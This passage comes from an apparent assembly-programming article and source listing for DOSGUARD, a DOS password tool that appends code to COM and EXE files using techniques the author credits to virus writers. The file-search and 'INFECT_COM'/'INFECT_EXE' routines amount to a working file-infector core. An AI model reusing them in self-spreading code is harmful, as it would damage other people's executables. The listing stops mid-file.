2. Make sure the file is not really an EXE file because after DOS 6.0 some
    files ending in ".com" were really EXEs.
3. Check to see if the file has already been modified by DOSGUARD by
checking
    if the values of the 4th and 5th bytes match the DOSGUARD identification
    string of "CG".
4. Make sure the file is not so large that when DOSGUARD adds its code it
    doesn't exceed the 64k segment size.
5. If the file passes 2-4 then its ok to modify, so DOSGUARD opens it and
    writes the code to the end of the file.
6. Calculate the size of the jump to the code we added and write the jump
    instruction along with the identification string to the beginning of the
    file.

I'll go over each of these steps in a little more detail with code snippets
where necessary.  The complete source code for DOSGUARD can be found at the
end of the article and at my web page.  Hopefully, the comments will be
enough
to explain any areas I don't discuss in detail.

Essentially, the way DOSGUARD modifies COM files is by inserting a jump at
the
beginning of the file which goes straight to the password authentication
code,
located at the end of the file.  If the correct password is entered by the
user, then it will restore the 5 bytes that were overwritten by the jump and
the identification string and execute the program just like DOSGUARD was
never
there.


COM MODIFICATION - STEP 1
-------------------------
Once we've found a COM file, the first thing to do is open it.  Then, after
running some tests on the file, we can determine if it is suitable for
modification.  But first, we need to read the first 5 bytes because we'll
need them later.

         mov     ax, 3D02h               ;Open file R/W
         mov     dx, 9Eh                 ;Filename, stored in DTA
         int     21h
         mov     bx, ax                  ;Save file handle in bx
         mov     ax, 3F00h               ;Read first 5 bytes from file
         mov     cx, 5
         mov     dx, offset obytes
         int     21h


COM MODIFICATION - STEP 2
-------------------------
After DOS 6.0, some files with the COM extension are actually EXEs.
COMMAND.COM, for instance, is one of these.  If we try to modify an EXE file
as
if it were a COM file, then we're going to really screw things up.  To
prevent
this, we make sure that the string "MZ" doesn't appear in the first two
bytes of
the file.  "MZ" is the string which tells DOS that a file is an EXE.

         ;Check to see if file is really an EXE
         cmp     word ptr[obytes], 'ZM'
         je      EXE


COM MODIFICATION - STEP 3
-------------------------
If the file had been previously altered by DOSGUARD, then the 4th and 5th
bytes
will contain the identification string "CG".  We need to make sure we skip
files
that have this identification string.

         ;Check to see if file is already infected
         ;if it is, then skip it
         cmp     word ptr [obytes + 3], 'GC'
         je      NO_INFECT


COM MODIFICATION - STEP 4
-------------------------
Another thing to watch out for is the file's size.  If the file will exceed
one segment in size when we add our code, then the file is too big to
modify.

         ;Make sure file isn't too large
         mov     ax, ds:[009Ah]          ;Size of file from DTA
         add     ax, offset ENDGUARD - offset COMGUARD + 100h
         jc      NO_INFECT               ;If ax overflows then don't infect


COM MODIFICATION - STEP 5
-------------------------
If the file is a suitable candidate for modification, then we simply write
our
code to the end of the file.  Also, we have to save the original first 5
bytes
from the file somewhere in your code.  In DOSGUARD's case, the 5 bytes are
already saved in the proper place because "obytes" is located within the
code
which we are about to write.

         xor     cx, cx                  ;cx = 0
         xor     dx, dx                  ;dx = 0
         mov     ax, 4202h               ;Move file pointer to the end of
file
         int     21h

         mov     ax, 4000h               ;Write the code to the end of file
         mov     dx, offset COMGUARD
         mov     cx, offset ENDGUARD - offset COMGUARD
         int     21h


COM MODIFICATION - STEP 6
-------------------------
The final step is to calculate the size of the jump to our code and write
the
opcode for the jump and the identification string over the first 5 bytes of
the
file.

         mov     ax, 4200h               ;Move file pointer to beginning of
         xor     cx, cx                  ; file to write jump
         xor     dx, dx
         int     21h

         ;Prepare the jump instruction to be written to beginning of file
         xor     ax, ax
         mov     byte ptr [bytes], 0E9h  ;opcode for jmp
         mov     ax, ds:[009Ah]          ;size of the file
         sub     ax, 3                   ;size of the jump instruction
         mov     word ptr [bytes + 1], ax;size of the jump

         ;Write the jump
         mov     cx, 5;                  ;size to be written
         mov     dx, offset bytes
         mov     ax, 4000h
         int     21h

         mov     ah, 3Eh                 ;Close file
         int     21h


RESPONSIBILITIES OF INSERTED CODE
--------------------------------
There are two problems which the inserted code has to deal with.  First,
since
the code could be located at any arbitrary offset within the segment, it
cannot
depend on the compiled absolute addresses of its data labels.  To solve this
problem we use a technique virus writers call the delta offset.  The delta
offset is the difference between the actual and compiled addresses of data.
Anytime our code accesses data in memory it adds the delta offset to the
data's
compiled address.  The following piece of code finds the delta offset.

         call    GET_START
         GET_START:
         pop     bp
         sub     bp, offset GET_START

The "call" pushes the current ip onto the stack, which is the actual address
of
the label "GET_START."  Subtract the compiled address from the actual one
and
there's our delta offset.

The second problem is to make sure the first 5 bytes of the host are
restored to
their original values before we return from our jump and execute the host.


STRUCTURE OF EXE FILES
----------------------
The EXE file format is much more complicated than the COM format.  The big
difference is that EXE files allow the program to specify how it wants its
segments to be laid out in memory, allowing programs to exceed one 64k
segment
in size.  Most EXEs will have separate code, data, and stack segments.

All of this information is stored in the EXE Header.  Here's a brief rundown
of
what the header looks like:

         Offset  Size    Field
         0       2       Signature.  Will always be 'MZ'
         2       2       Last Page Size.  Number of bytes on the last
                         page of memory.
         4       2       Page Count.  Number of 512 byte pages in the file.
         6       2       Relocation Table Entries.  Number of items in the
                         relocation pointer table.
         8       2       Header Size.  Size of header in paragraphs,
                         including the relocation pointer table.
         10      2       Minalloc
         12      2       Maxalloc
         14      2       Initial Stack Segment.
         16      2       Initial Stack Pointer.
         18      2       Checksum.  (Usually ignored)
         20      2       Initial Instruction Pointer
         22      2       Initial Code Segment
         24      2       Relocation Table Offset.  Offset to the start of
                         the relocation pointer table.
         26      2       Overlay Number.  Primary executables(the ones we
                         wish to modify) always have this set to zero.

Following the EXE header is the relocation pointer table, with a variable
amount of blank space between the header and the start of the table.  The
relocation table is a table of offsets.  These offsets are combined with
starting segment values calculated by DOS to point to a word in memory where
the final segment address is written.  Essentially, the relocation pointer
table is DOS's way to handle the dynamic placement of segments into physical
memory.  This isn't a problem with COM files because there is only one
segment
and the program isn't aware of anything else.  Following the relocation
pointer
table is another variable amount of reserved space and finally the program
body.

To successfully add code to an EXE file requires careful manipulation of the
EXE
header and relocation pointer table.


OUTLINE OF EXE MODIFICATION
---------------------------
1.  Open the file and read the 1st 2 bytes(DOSGUARD actually reads 5).
2.  Check for EXE signature "MZ".
3.  Read the EXE header.
4.  Check the file for previous infection.
5.  Make sure that the Overlay Number is 0.
6.  Make sure the file is a DOS EXE.
7.  If the file passes 2-6 then it is ok to modify.  The first step is to
check
     the relocation pointer table to see if there is room to add 2 pointers.
If
     there is room, then jump to step 9.
8.  If there isn't enough room in the relocation pointer table, then
DOSGUARD
     has to make room.  It reads in the entire file after the relocation
pointer
     table and writes it back out one paragraph higher in memory.
9.  Save the original ss, sp, cs, and ip.
10. Adjust the file length to paragraph boundary.
11. Write code to the end of the file.
12. Adjust the EXE header to reflect the new starting segments and file
size.
13. Write out the header.
14. Modify the relocation pointer table.

The easiest way to think about EXE modification is to imagine that we are
adding a complete COM program to the end of the file.  Our code will occupy
its
own segment located just after the host.  This one segment will serve as a
code,
data, and stack segment just like in a COM program.  Instead of inserting a
jump
to take us there, we will simply adjust the starting segment values in the
EXE
header to point to our segment.


EXE MODIFICATION - STEP 1
-------------------------
The same as with COM files, except that the only bytes we actually need are
the
first two.  With EXE files we will use different methods for determining
previous modification(I try to avoid using the viral term "infection") and
for
transferring execution to our code.


EXE MODIFICATION - STEP 2
-------------------------
Check the first two bytes for the EXE signature "MZ".  If the file doesn't
start with "MZ," then it isn't a DOS EXE.

         cmp     word ptr[obytes], 'ZM'
         je      EXE


EXE MODIFICATION - STEP 3
-------------------------
Now, DOSGUARD simply reads the EXE header into a 28 byte buffer.  Later, we
will make the necessary changes to the header and write it back out.

         xor     cx, cx                  ;Move the file pointer back
         xor     dx, dx                  ;to the beginning of the file
         mov     ax, 4200h
         int     21h
         mov     cx, 1Ch                 ;read exe header (28 bytes)
         mov     dx, offset exehead      ;into buffer
         mov     ah, 3Fh
         int     21h


EXE MODIFICATION - STEP 4
-------------------------
We don't use a signature string to mark EXE files.  Instead, we compare the
code entry point with the size of the file.  If the file has been previously
modified by DOSGUARD, then we know that the distance of the code entry point
from the end of the file will be the length of the code that DOSGUARD adds.
To
put things in mathematical terms:

         (initial cs * 16) + (size of code DOSGUARD adds) + (size of header)

will equal the size of the file.  The initial cs times 16 is the code entry
point, of course.  You have to add the header size because it isn't loaded
into
memory along with the rest of the code and data.

         ;Make sure it hasn't already been infected
         ;If (initial CS * 16) + (size of code) + (size of header) ==
filesize
         ;  then the file has already been infected
         mov     ax, word ptr [exehead+22]
         mov     dx, 16
         mul     dx
         add     ax, offset ENDGUARD2 - offset EXEGUARD
         adc     dx, 0
         mov     cx, word ptr [exehead+8]
         add     cx, cx
         add     cx, cx
         add     cx, cx
         add     cx, cx
         add     ax, cx
         adc     dx, 0
         cmp     ax, word ptr cs:[9Ah]
         jne     EXEOK
         cmp     dx, word ptr cs:[9Ch]
         je      NO_INFECT


EXE MODIFICATION - STEP 5
-------------------------
Another simple test that needs to be done is to make sure that the Overlay
Number stored in the EXE header is 0.  The code for this is simple.

         ;Make sure Overlay Number is 0
         cmp     word ptr [exehead+26], 0
         jnz     NO_INFECT


EXE MODIFICATION - STEP 6
-------------------------
This part is kind of tricky.  There are lots of files out there with the EXE
extension that aren't DOS executables.  Both Windows and OS/2 use this
extension as well, for instance.  To complicate matters, there isn't an easy
way to automatically distinguish DOS EXEs from the others.  The technique
that
I use in DOSGUARD is to check the offset of the relocation pointer table and
make sure that it is less than 40h.  This should always detect Windows and
OS/2
programs, but it sometimes raises false alarms on valid DOS files.

         ;Make sure it is a DOS EXE (as opposed to windows or OS/2)
         cmp     word ptr [exehead+24], 40h
         jae     NO_INFECT


EXE MODIFICATION - STEP 7
-------------------------
Now that we know we have a file that we can modify we just have to determine
if
its going to be easy to modify or a real pain.  Here's the deal.  The
relocation pointer table is always an even multiple of 16 bytes in size.
Each
pointer in the table is 4 bytes.  For our purposes, we need to add 2
pointers to
the table.  That means the table must have at least 8 bytes free in order to
leave it at its current size.  If it doesn't have room for two more
pointers,
then we will have to make room.  That means reading in the whole file after
the
table and writing it back out with 16 bytes more space for the table.

To find out if there is enough room, all you have to do is subtract the
offset
of the relocation pointer table and the number of entries in the table from
the
size of the header.  The result is the amount of free space in the table.
All
of this information can be found in the handy dandy EXE header.  Of course,
you
have to take into account the units that each of these values are stored in
(bytes, paragraphs, etc.)

         ;Check the relocation pointer table to see if there is
         ;room.  If there isn't then we'll have to make room.
         mov     ax, word ptr [exehead+8];size of header in paragraphs
         add     ax, ax                  ;
         add     ax, ax                  ;Convert to double words.
         sub     ax, word ptr [exehead+6];Subtract # of entries each of
         add     ax, ax                  ;which is a double word and then
         add     ax, ax                  ;convert the final total to bytes.
         sub     ax, word ptr [exehead+24];If there are 8 bytes left after
         cmp     ax, 8                    ;you subtract the offset to the
         jc      NOROOM                   ;reloc table then there is room.
         jmp     HAVEROOM


EXE MODIFICATION - STEP 8
-------------------------
The first thing to do is move the file pointer to the correct spot just
after
the last entry in the relocation pointer table.

         xor     cx, cx                  ;Move the file pointer to the end of
         mov     dx, word ptr [exehead+24]  ;the relocation pointer table.
         mov     ax, word ptr [exehead+6];size of relocation table in doubles
         add     ax, ax                  ;* 4 to get bytes
         add     ax, ax
         add     dx, ax                  ;add that to start of table
         push    dx
         mov     ax, 4200h
         int     21h

Now, DOSGUARD calculates the amount which needs to be written.  This code is
in
the function called CALC_SIZE.  When CALC_SIZE is finished, cx will hold the
number of pages and "lps" will hold the size of the last page since it
probably
will not be a full 512 byte page.

         ;dx holds the position in the file where we want to start reading.
         ;So, the amount to read in and write back out is equal to the size
         ;of the file minus dx.
         mov     cx, word ptr [exehead+2]
         mov     word ptr [lps], cx      ;Copy Last Page Size into lps
         mov     cx, word ptr [exehead+4];Copy Num Pages into cx
         cmp     dx, word ptr [lps]      ;If bytes to subtract are less than
         jbe     FINDLPS                 ;lps then just subtract them and
exit
         mov     ax, dx
         xor     dx, dx
         mov     cx, 512
         div     cx                      ;ax = pages to subtract
         mov     cx, word ptr [exehead+4];dx = remainder to subtract from lps
         sub     cx, ax
         cmp     dx, word ptr [lps]
         jbe     FINDLPS
         sub     cx, 1
         mov     ax, dx
         sub     ax, word ptr [lps]
         mov     dx, 512
         sub     dx, ax

         FINDLPS:
         sub     word ptr [lps], dx      ;Subtract start position and leave
                                         ;Num Pages the same

Once you know the amount of code you have to move, you have to come up with
a
way to simultaneously read and write from the same file without overwriting
data that hasn't been read yet.  DOSGUARD's solution is to use a 16 byte
buffer.  DOSGUARD's move loop reads 528 bytes and writes out 512 bytes with
each
iteration.  In other words, it reads 16 bytes ahead of where it is writing
so
that it doesn't overwrite bytes before they're read.  DOSGUARD has a number
of
functions for reading and writing pages, reading and writing paragraphs,
and
moving the file pointer around.  It also has one function for moving the 16
bytes at the end of the 528 byte buffer in memory to the front.  Well, I'll
shut
up now and show you the code for the move loop.

         mov     dx, offset buffer
         call    READ_PAGE
         mov     dx, offset para
         call    READ_PARA
         call    DECFP_PAGE
         call    WRITE_PAGE
         call    MOVE_PARA
         dec     cx
         cmp     cx, 1
         je      LASTPAGE

         MOVELOOP:
         mov     dx, offset buffer + 16
         call    READ_PAGE
         call    DECFP_PAGE
         call    WRITE_PAGE
         call    MOVE_PARA
         dec     cx
         cmp     cx, 1
         jne     MOVELOOP

When DOSGUARD gets to the last page, it finishes things off by reading the
last
fraction of a page and then writing out those bytes plus the 16 bytes that
were
left buffered from the last iteration of the move loop.

         LASTPAGE:
         sub     word ptr [lps], 16
         mov     cx, word ptr [lps]
         mov     dx, offset buffer + 16
         mov     ah, 3Fh
         int     21h
         push    cx
         mov     dx, cx
         neg     dx
         mov     cx, -1
         mov     ax, 4201h
         int     21h
         pop     cx
         add     cx, 16
         mov     dx, offset buffer
         mov     ah, 40h
         int     21h

Last, but not least, there is a little maintanence to do.

         ;Got to adjust the file size since it will be used later
         add     word ptr cs:[9Ah], 16
         adc     word ptr cs:[9Ch], 0

         ;Increment the header size within the EXE header
         add     word ptr cs:[exehead+8], 1

         ;Change Page Count and Last Page Size in EXE header
         cmp     word ptr [exehead+2], 496
         jae     ADDPAGE
         add     word ptr [exehead+2], 16
         jmp     HAVEROOM

Oh yeah, there is one more condition that needs to be handled here.  If the
last
page was almost full(496 or more bytes), then adding 16 bytes to the file
size
will overflow that page so you have to add a whole new page.

         ADDPAGE:
         ;Adjust the header to add a page if the 16 additional bytes run
         ;over to a new page.
         inc     word ptr [exehead+4]
         mov     ax, 512
         sub     ax, word ptr [exehead+2]
         mov     dx, 16
         sub     dx, ax
         mov     word ptr [exehead+2], dx


EXE MODIFICATION - STEP 9
-------------------------
Whew!  Step 8 was a doozy, but now we're almost done.  All Step 9 requires
of
us is to save the original segment values from our victim.  DOSGUARD saves
these values in the order that they are found within the EXE header.

         mov     ax, word ptr [exehead+14] ;save orig stack segment
         mov     [hosts], ax
         mov     ax, word ptr [exehead+16] ;save orig stack pointer
         mov     [hosts+2], ax
         mov     ax, word ptr [exehead+20] ;save orig ip
         mov     [hostc], ax
         mov     ax, word ptr [exehead+22] ;save orig cs
         mov     [hostc+2], ax


EXE MODIFICATION - STEP 10
--------------------------
It will make things a little easier later on if the end of the file we are
about to modify lies on a paragraph boundary.  This way the starting ip for
the
new code that we're adding will always be zero.

         ;adjust file length to paragraph boundary
         mov     cx, word ptr cs:[9Ch]
         mov     dx, word ptr cs:[9Ah]
         or      dl, 0Fh
         add     dx, 1
         adc     cx, 0
         mov     cs:[9Ch], cx
         mov     cs:[9Ah], dx
         mov     ax, 4200h               ;move file pointer to end of file
         int     21h                     ;plus boundary


EXE MODIFICATION - STEP 11
--------------------------
Finally, we can write our code to the file.  Just like with the COM file, we
will write our code to the end of the file.  The difference is in how we get
there when its time to execute it.  With COM files we used a jump.  With EXE
files we adjust the starting cs:ip to point to our code.

         mov     cx, offset ENDGUARD2 - offset EXEGUARD  ;write code to end
         mov     dx, offset EXEGUARD                     ;of the exe file
         mov     ah, 40h
         int     21h


EXE MODIFICATION - STEP 12
--------------------------
With our code neatly tucked after the host program's code, its time to
modify
the EXE header so that our code is the first to execute.  We also have to
adjust the size fields in the EXE header to take into account all the code
we
just added.

The first thing to is figure out what the starting segment values need to
be.
The starting cs will simply be the original file size divided by 16 minus
the
header size.  The initial ip will be 0 because of Step 11.  In DOSGUARD's
case
the ss will be the same as the cs and the sp will point to an address 256
bytes
after the end of our code.  256 bytes is plenty of room for DOSGUARD's
stack.

         mov     ax, word ptr cs:[9Ah]   ;calculate module's CS
         mov     dx, word ptr cs:[9Ch]   ;ax:dx contains orig file size
         mov     cx, 16                  ;CS = file size / 16 - header size
         div     cx
         sub     ax, word ptr [exehead+8];header size in paragraphs
         mov     word ptr [exehead+22], ax ;ax is now initial cs
         mov     word ptr [exehead+14], ax ;ax is now initial ss
         mov     word ptr [exehead+20], 0  ;initial ip
         mov     word ptr [exehead+16], ENDGUARD2 - EXEGUARD + 100h ;initial
sp

This next bit of code calculates the new file size, in pages of course.

         ;calculate new file size
         mov     dx, word ptr cs:[9Ch]
         mov     ax, word ptr cs:[9Ah]
         add     ax, offset ENDGUARD2 - offset EXEGUARD + 200h
         adc     dx, 0
         mov     cx, 200h
         div     cx
         mov     word ptr [exehead+4], ax
         mov     word ptr [exehead+2], dx
         add     word ptr [exehead+6], 2


EXE MODIFICATION - STEP 13
--------------------------
Now, we should be through with the header so we can write it back out to the
file.

         ;Write out the new header
         mov     cx, 1Ch
         mov     dx, offset exehead
         mov     ah, 40h
         int     21h


EXE MODIFICATION - STEP 14
--------------------------
Last, but not least, we have to modify the relocation pointer table.  First,
we need to move the file pointer to where we need to add the new entries.

         mov     ax, word ptr [exehead+6];Get the # of relocatables
         dec     ax                      ;Position to add relocatable equals
         dec     ax                      ;(# - 2)*4 + table offset
         mov     cx, 4
         mul     cx
         add     ax, word ptr [exehead+24]
         adc     dx, 0
         mov     cx, dx
         mov     dx, ax
         mov     ax, 4200h               ;move file pointer to position
         int     21h

Now, we have to add two pointers to the table.  The first points to "hosts,"
which is the stack segment of the original program.  The second points to
"hostc+2," which holds the original program's code segment.

         ;Use exehead as a buffer for relocatables.
         ;Put two pointers in this buffer, first points to ss in
         ;hosts and second points to cs in hostc.
         mov     word ptr [exehead], ENDGUARD2 - EXEGUARD - 10
         mov     ax, word ptr [exehead+22]
         mov     word ptr [exehead+2], ax
         mov     word ptr [exehead+4], ENDGUARD2 - EXEGUARD - 4
         mov     word ptr [exehead+6], ax
         mov     cx, 8
         mov     dx, offset exehead
         mov     ah, 40h                 ;Write the 8 bytes.
         int     21h
         mov     ah, 3Eh                 ;Close the file.
         int     21h


RESPONSIBILITIES OF INSERTED CODE
---------------------------------
There are several items which the code module we added must take into
consideration.  First of all, when it is finished, the state of registers,
etc.
must be exactly what the original program would expect them to be.  For
instance, ax is set by DOS to indicate whether or not the Drive ID stored in
the FCBs is valid.  So,  the value of ax must be preserved by our code.
Also,
the original program may expect other registers to be set to initial values
of zero.  And of course, the segment registers need to be restored after our
code's execution.

In order to actually restore control to the host, our code must restore ss
and
sp to their original values.  Then, it jumps to the original cs:ip.

Also, inserted code can't be dependent on absolute addresses for its data.
Therefore, DOSGUARD accesses all data by its offset from the end of the
file.


CONCLUSION
----------
Hopefully, i've explained the techniques I used in developing DOSGUARD well
enough for you to develop your own binary modiying programs.  As I mentioned
at
the beginning of this article, DOSGUARD has a lot a room for improvement.
If
you are interested then you should check out my web page and download the
source for ENCGUARD, a more secure version of DOSGUARD.  A nice way to
extend
DOSGUARD would be to improve on the encryption techniques used in ENCGUARD.
If
I ever find the time I would like to write a Win32 version of DOSGUARD which
could safely modify the PE file format.  If I ever do embark on such a task,
I'll be sure to let the readers of Assembly Programming Journal know about
it.


REFERENCES
----------
"The Giant Black Book of Computer Viruses, 2nd edition" by Mark Ludwig


CONTACT INFORMATION
-------------------
email:  jjsimpso@...
web page: http://www4.ncsu.edu/~jjsimpso/index.html

Check out my web page for more information on my research into code
modification.  Also, feel free to email me with ideas, corrections,
improvements, etc.


---------------------------BEGIN
DOSGUARD.ASM----------------------------------
.model tiny
.code

         ORG     100h

START:
         jmp     BEGINCODE               ;Jump the identification string
         DB      'CG'

BEGINCODE:

         mov     dx, offset filter1
         call    FIND_FILES
         mov     dx, offset filter2
         call    FIND_FILES

         mov     ax, 4C00h               ;DOS terminate
         int     21h

;-------------------------------------------------------------------------
;Procedure to find and then infect files
;-------------------------------------------------------------------------
FIND_FILES:

         mov     ah, 4Eh                 ;Search for files matching filter
         int     21h

SLOOP:
         jc      DONE
         mov     ax, 3D02h               ;Open file R/W
         mov     dx, 9Eh                 ;Filename, stored in DTA
         int     21h
         mov     bx, ax                  ;Save file handle in bx
         mov     ax, 3F00h               ;Read first 5 bytes from file
         mov     cx, 5
         mov     dx, offset obytes
         int     21h

         ;Check to see if file is really an EXE
         cmp     word ptr[obytes], 'ZM'
         je      EXE

COM:
         ;Check to see if file is already infected
         ;if it is, then skip it
         cmp     word ptr [obytes + 3], 'GC'
         je      NO_INFECT


         ;Make sure file isn't too large
         mov     ax, ds:[009Ah]          ;Size of file
         add     ax, offset ENDGUARD - offset COMGUARD + 100h
         jc      NO_INFECT               ;If ax overflows then don't infect

         ;If we made it this far then we know the file is safe to modify
         call    INFECT_COM
         jmp     NO_INFECT

EXE:
         ;Read the EXE Header
         call    READ_HEADER
         jc      NO_INFECT               ;error reading file so skip it

         ;Make sure it hasn't already been infected
         ;If (initial CS * 16) + (size of EXEGUARD) + (size of header) ==
size
         ;  then the file has already been infected
         mov     ax, word ptr [exehead+22]
         mov     dx, 16
         mul     dx
         add     ax, offset ENDGUARD2 - offset EXEGUARD
         adc     dx, 0
         mov     cx, word ptr [exehead+8]
         add     cx, cx
         add     cx, cx
         add     cx, cx
         add     cx, cx
         add     ax, cx
         adc     dx, 0
         cmp     ax, word ptr cs:[9Ah]
         jne     EXEOK
         cmp     dx, word ptr cs:[9Ch]
         je      NO_INFECT

EXEOK:
         ;Make sure Overlay Number is 0
         cmp     word ptr [exehead+26], 0
         jnz     NO_INFECT

         ;Make sure it is a DOS EXE (as opposed to windows or OS/2
         cmp     word ptr [exehead+24], 40h
         jae     NO_INFECT

         call    INFECT_EXE

NO_INFECT:
         mov     ax, 4F00h               ;Find next file
         int     21h
         jmp     SLOOP

DONE:

         ret


;-------------------------------------------------------------------------
;Procedure to infect COM files
;-------------------------------------------------------------------------
INFECT_COM:
         xor     cx, cx                  ;cx = 0
         xor     dx, dx                  ;dx = 0
         mov     ax, 4202h               ;Move file pointer to the end of
file
         int     21h

         mov     ax, 4000h               ;Write the code to the end of file
         mov     dx, offset COMGUARD
         mov     cx, offset ENDGUARD - offset COMGUARD
         int     21h

         mov     ax, 4200h               ;Move file pointer to beginning of
         xor     cx, cx                  ; file to write jump
         xor     dx, dx
         int     21h

         ;Prepare the jump instruction to be written to beginning of file
         xor     ax, ax
         mov     byte ptr [bytes], 0E9h  ;opcode for jmp
         mov     ax, ds:[009Ah]          ;size of the file
         sub     ax, 3                   ;size of the jump instruction
         mov     word ptr [bytes + 1], ax;size of the jump

         ;Write the jump
         mov     cx, 5;                  ;size to be written
         mov     dx, offset bytes
         mov     ax, 4000h
         int     21h

         mov     ah, 3Eh                 ;Close file
         int     21h

         ret


;-------------------------------------------------------------------------
;Procedure to infect EXE files
;-------------------------------------------------------------------------
INFECT_EXE:

         ;Check the relocation pointer table to see if there is
         ;room.  If there isn't then we'll have to make room.
         mov     ax, word ptr [exehead+8];size of header in paragraphs
         add     ax, ax                  ;
         add     ax, ax                  ;Convert to double words.
         sub     ax, word ptr [exehead+6];Subtract # of entries each of
         add     ax, ax                  ;which is a double word and then
         add     ax, ax                  ;convert the final total to bytes.
         sub     ax, word ptr [exehead+24];If there are 8 bytes left after
         cmp     ax, 8                    ;you subtract the offset to the
         jc      NOROOM                   ;reloc table then there is room.
         jmp     HAVEROOM

NOROOM:
         ;Not enough room in the relocation table so we are going to
         ;have to add a paragraph to the table.  As a result, we must
         ;read in the whole file after the relocation table and write
         ;it back out one paragraph down in memory.
         xor     cx, cx                  ;Move the file pointer to the end of
         mov     dx, word ptr [exehead+24]  ;the relocation pointer table.
         mov     ax, word ptr [exehead+6];size of relocation table in doubles
         add     ax, ax                  ;* 4 to get bytes
         add     ax, ax
         add     dx, ax                  ;add that to start of table
         push    dx
         mov     ax, 4200h
         int     21h

         pop     dx
         call    CALC_SIZE
         cmp     cx, 1
         je      LASTPAGE

         mov     dx, offset buffer
         call    READ_PAGE
         mov     dx, offset para
         call    READ_PARA
         call    DECFP_PAGE
         call    WRITE_PAGE
         call    MOVE_PARA
         dec     cx
         cmp     cx, 1
         je      LASTPAGE

MOVELOOP:
         mov     dx, offset buffer + 16
         call    READ_PAGE
         call    DECFP_PAGE
         call    WRITE_PAGE
         call    MOVE_PARA
         dec     cx
         cmp     cx, 1
         jne     MOVELOOP

LASTPAGE:
         sub     word ptr [lps], 16
         mov     cx, word ptr [lps]
         mov     dx, offset buffer + 16
         mov     ah, 3Fh
         int     21h
         push    cx
         mov     dx, cx
         neg     dx
         mov     cx, -1
         mov     ax, 4201h
         int     21h
         pop     cx
         add     cx, 16
         mov     dx, offset buffer
         mov     ah, 40h
         int     21h

         ;Got to adjust the file size since it will be used later
         add     word ptr cs:[9Ah], 16
         adc     word ptr cs:[9Ch], 0

         ;Increment the header size within the EXE header
         add     word ptr cs:[exehead+8], 1

         ;Change Page Count and Last Page Size in EXE header
         cmp     word ptr [exehead+2], 496
         jae     ADDPAGE
         add     word ptr [exehead+2], 16
         jmp     HAVEROOM

ADDPAGE:
         ;Adjust the header to add a page if the 16 additional bytes run
         ;over to a new page.
         inc     word ptr [exehead+4]
         mov     ax, 512
         sub     ax, word ptr [exehead+2]
         mov     dx, 16
         sub     dx, ax
         mov     word ptr [exehead+2], dx

HAVEROOM:
         mov     ax, word ptr [exehead+14] ;save orig stack segment
         mov     [hosts], ax
         mov     ax, word ptr [exehead+16] ;save orig stack pointer
         mov     [hosts+2], ax
         mov     ax, word ptr [exehead+20] ;save orig ip
         mov     [hostc], ax
         mov     ax, word ptr [exehead+22] ;save orig cs
         mov     [hostc+2], ax

         mov     cx, word ptr cs:[9Ch]   ;adjust file length to paragraph
         mov     dx, word ptr cs:[9Ah]   ;  boundary
         or      dl, 0Fh
         add     dx, 1
         adc     cx, 0
         mov     cs:[9Ch], cx
         mov     cs:[9Ah], dx
         mov     ax, 4200h               ;move file pointer to end of file
         int     21h                     ;plus boundary

         mov     cx, offset ENDGUARD2 - offset EXEGUARD  ;write code to end
         mov     dx, offset EXEGUARD                     ;of the exe file
         mov     ah, 40h
         int     21h

         xor     cx, cx                  ;Move file pointer to beginning of
file
         xor     dx, dx
         mov     ax, 4200h
         int     21h

         ;adjust the EXE header and then write it back out
         mov     ax, word ptr cs:[9Ah]   ;calculate module's CS
         mov     dx, word ptr cs:[9Ch]      ;ax:dx contains orig file size
         mov     cx, 16                  ;CS = file size / 16 - header size
         div     cx
         sub     ax, word ptr [exehead+8];header size in paragraphs
         mov     word ptr [exehead+22], ax ;ax is now initial cs
         mov     word ptr [exehead+14], ax ;ax is now initial ss
         mov     word ptr [exehead+20], 0  ;initial ip
         mov     word ptr [exehead+16], ENDGUARD2 - EXEGUARD + 100h ;initial
sp

         mov     dx, word ptr cs:[9Ch]   ;calculate new size file size
         mov     ax, word ptr cs:[9Ah]
         add     ax, offset ENDGUARD2 - offset EXEGUARD + 200h
         adc     dx, 0
         mov     cx, 200h
         div     cx
         mov     word ptr [exehead+4], ax
         mov     word ptr [exehead+2], dx
         add     word ptr [exehead+6], 2

         mov     cx, 1Ch                 ;Write out the new header
         mov     dx, offset exehead
         mov     ah, 40h
         int     21h

         ;modify relocatables table
         mov     ax, word ptr [exehead+6];Get the # of relocatables
         dec     ax                      ;Position to add relocatable equals
         dec     ax                      ;(# - 2)*4 + table offset
         mov     cx, 4
         mul     cx
         add     ax, word ptr [exehead+24]
         adc     dx, 0
         mov     cx, dx
         mov     dx, ax
         mov     ax, 4200h               ;move file pointer to position
         int     21h

         ;Use exehead as a buffer for relocatables.
         ;Put two pointers in this buffer, first points to ss in
         ;hosts and second points to cs in hostc.
         mov     word ptr [exehead], ENDGUARD2 - EXEGUARD - 10
         mov     ax, word ptr [exehead+22]
         mov     word ptr [exehead+2], ax
         mov     word ptr [exehead+4], ENDGUARD2 - EXEGUARD - 4
         mov     word ptr [exehead+6], ax
         mov     cx, 8
         mov     dx, offset exehead
         mov     ah, 40h                 ;Write the 8 bytes.
         int     21h
         mov     ah, 3Eh                 ;Close the file.
         int     21h

         ret                             ;Done!

;-------------------------------------------------------------------------
;Procedure to calculate the amount that needs to be written
;-------------------------------------------------------------------------
CALC_SIZE:
         ;dx holds the position in the file where we want to start reading.
         ;So, the amount to read in and write back out is equal to the size
         ;of the file minus dx.

         mov     cx, word ptr [exehead+2]
         mov     word ptr [lps], cx      ;Copy Last Page Size into lps
         mov     cx, word ptr [exehead+4];Copy Num Pages into cx

         cmp     dx, word ptr [lps]      ;If bytes to subtract are less than
         jbe     FINDLPS                 ;lps then just subtract them and
exit
         mov     ax, dx
         xor     dx, dx
         mov     cx, 512
         div     cx                      ;ax = pages to subtract
         mov     cx, word ptr [exehead+4];dx = remainder to subtract from lps
         sub     cx, ax
         cmp     dx, word ptr [lps]
         jbe     FINDLPS
         sub     cx, 1
         mov     ax, dx
         sub     ax, word ptr [lps]
         mov     dx, 512
         sub     dx, ax

FINDLPS:
         sub     word ptr [lps], dx      ;Subtract start position and leave
                                         ;Num Pages the same

         ret

;-------------------------------------------------------------------------
;Procedure to read the EXE Header
;-------------------------------------------------------------------------
READ_HEADER:
         xor     cx, cx                  ;Move the file pointer back
         xor     dx, dx                  ;to the beginning of the file
         mov     ax, 4200h
         int     21h
         mov     cx, 1Ch                 ;read exe header (28 bytes)
         mov     dx, offset exehead      ;into buffer
         mov     ah, 3Fh
         int     21h

         ret                             ;return with cf set properly

;-------------------------------------------------------------------------
;Procedure to read a page
